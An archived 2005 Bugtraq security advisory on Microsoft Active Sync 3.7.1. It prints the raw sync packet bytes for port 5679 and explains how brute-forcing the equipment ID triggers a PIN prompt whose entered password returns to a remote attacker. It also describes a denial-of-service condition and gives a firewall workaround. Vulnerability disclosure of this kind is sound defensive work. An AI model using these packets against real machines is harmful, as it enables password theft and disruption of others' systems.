Remote Password Compromise of Microsoft Active Sync 3.7.1

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Remote Password Compromise of Microsoft Active Sync 3.7.1
From: nospam@xxxxxxxxxxxxxx
Date: 4 Aug 2005 02:50:32 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Airscanner Mobile Security Advisory: Remote Password Compromise of Microsoft 
Active Sync 3.7.1

Product:
Microsoft Active Sync 3.7.1

Platform:
Tested on Windows XP Professional SP-2  and Windows Mobile Pocket PC 2003

Requirements:
Windows XP Professional with Active Sync 3.7.1

Credits:
Seth Fogie
Airscanner Mobile Security
www.airscanner.com
July 22, 2005

Risk Level:
Low for denial of service attacks. Medium for password collection attack.

Summary:
&#8221;Active Sync&#8221; is Microsoft&#8217;s  default connectivity program 
that keeps a desktop PC and a handheld Pocket PC synchronized. It also includes 
various other features, such as debugging ability, file transfer, etc. 

Details:
When a Pocket PC device attempts to sync to a PC, it will send three initial 
packets to the Active Sync program on port 5679. The following outlines the 
contents of the packets:

packet1[] = "\x00\x00\x00\x00";
packet2[] = "\x98\x00\x00\x00"; //SIZE OF NEXT PACKET
packet3[] =
"\x28\x00\x00\x00" 
"\x04\x15\x40\x04"
"\x11\x0a\x00\x00" //2577 (AUTORUN?)
"\x05\x00\x00\x00"
"\x59\x29\x6d\x46" //EQUIP ID
"\x00\x00\x00\x00"
"\x28\x00\x00\x00" //LINK TO POCKET_PC1 TEXT
"\x3e\x00\x00\x00" //LINK TO POCKETPC TEXT
"\x5c\x00\x00\x00" //LINK TO SSKD TEXT
"\x78\x00\x00\x00" //LINK TO AXIM X50 TEXT
"\x50\x00\x6f\x00" //TEXT IN UNICODE
"\x63\x00\x6b\x00\x65\x00\x74\x00\x5f\x00\x50\x00\x43\x00\x31\x00\x00\x00\x50\x00"
"\x6f\x00\x63\x00\x6b\x00\x65\x00\x74\x00\x50\x00\x43\x00\x00\x00"
"\x53\x00\x53\x00\x44\x00\x4b\x00\x00\x00\x00\x00\x44\x00\x65\x00"
"\x6c\x00\x6c\x00\x20\x00\x41\x00\x78\x00\x69\x00\x6d\x00\x20\x00"
"\x58\x00\x35\x00\x30\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00"
"\x04\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00";

If the equipment ID value is valid, the PC will respond with a x12345678. If 
the equipment ID is not correct, the response will be x03. With this static 
response, it is trivial to brute force the valid equipment ID value. The reason 
this is important is because if you change the value in packet1 to x00000001 to 
the correct corresponding PID, a prompt will appear on the PC asking for a PIN 
value (figure 1). If a target enters a password, the information will be passed 
back to the remote, requesting client. If a value other than x01 is sent, that 
value will be XORed with the response to pseudo-'encrypt' the password. This 
method of information gathering is possible from over a network and does work 
over the Internet. From a quick nmap scan, we found about roughly 10 computers 
with this port open per 50 class C subnets.
 
Finally, we discovered that if numerous attempts were made to initialize with a 
PC running Active Sync, after about four attempts the Active Sync process 
freezes. In addition, if a user attempts to sync while a brute force equipment 
ID attempt is underway, the sync will usually fail.

Workaround:
Block Internet and LAN access to port 5679 using a firewall until this issue is 
patched. 

Vendor Response
Awaiting response.

More information avaliable here
http://www.airscanner.com/security/activesync371.htm

-----------------------------------
Mobile Antivirus Researchers Association
http://www.mobileav.org

Prev by Date: Re: Zone Alarm Security Contact
Next by Date: Re: On classifying attacks
Previous by thread: MDKSA-2005:130 - Updated apache packages fix vulnerabilities
Next by thread: MDKSA-2005:131 - Updated ethereal packages fix multiple vulnerabilities
Index(es):
- Date
- Thread